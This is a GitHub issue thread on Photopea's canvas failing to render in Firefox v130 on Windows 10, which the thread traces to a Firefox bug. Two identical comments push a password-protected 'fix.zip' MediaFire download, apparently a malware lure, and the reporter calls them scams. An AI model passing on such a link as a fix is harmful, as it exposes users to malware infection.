### ISSUE TITLE
the canvas doesn't render in Firefox v130 Win10

### ISSUE THREAD

**Issue by SpiritAxolotl** [photopea/photopea#7105]
Your Operating System: Windows 10
Your Web Browser: Firefox Developer Edition v130.0b9
The problem happens in the Incognito Mode, too: yes

**This must be done to see the problem**
1. Download Firefox Developer Edition from [here](https://www.mozilla.org/en-US/firefox/developer/)
2. Make sure it's v130 or above by going to Application Menu > Help > About Firefox
3. Go to www.photopea.com
4. Paste anything or open anything
5. Blank screen

![image](https://github.com/user-attachments/assets/90046757-af60-4084-baab-230963e4f947)

Photopea works on v129. Just something about v130 breaks it.

**Comment by CoZmoTheGod** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by mohamed-elsankary** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by SpiritAxolotl** [comment]
oh my god the scam comments

**Comment by KwiatekMiki** [comment]
Works on Linux so probably that

**Comment by SpiritAxolotl** [comment]
someone else tested Firefox v130 on Windows 11 and it worked for them

**Comment by SpiritAxolotl** [comment]
okay so it actually seems like this is a bug with firefox rather than photopea. no `<canvas>` elements render. I'll take this to bugzilla now

**Comment by photopea** [comment]
I am pretty sure it is a bug in your browser, as it is not a stable release of a browser.

I feel like someone can just make a random Notepad app, and you try to type Photopea.com into it, and if Photopea does not appear in front of you, you report it to us as a bug in Photopea, and not to the creator of your Notepad app.

**Comment by SpiritAxolotl** [comment]
I didn't realize it was a firefox bug at first. It was only when other canvas elements didn't work when I realized. Photopea was just the first time I encountered it so I assumed it to be a photopea issue. Sorry
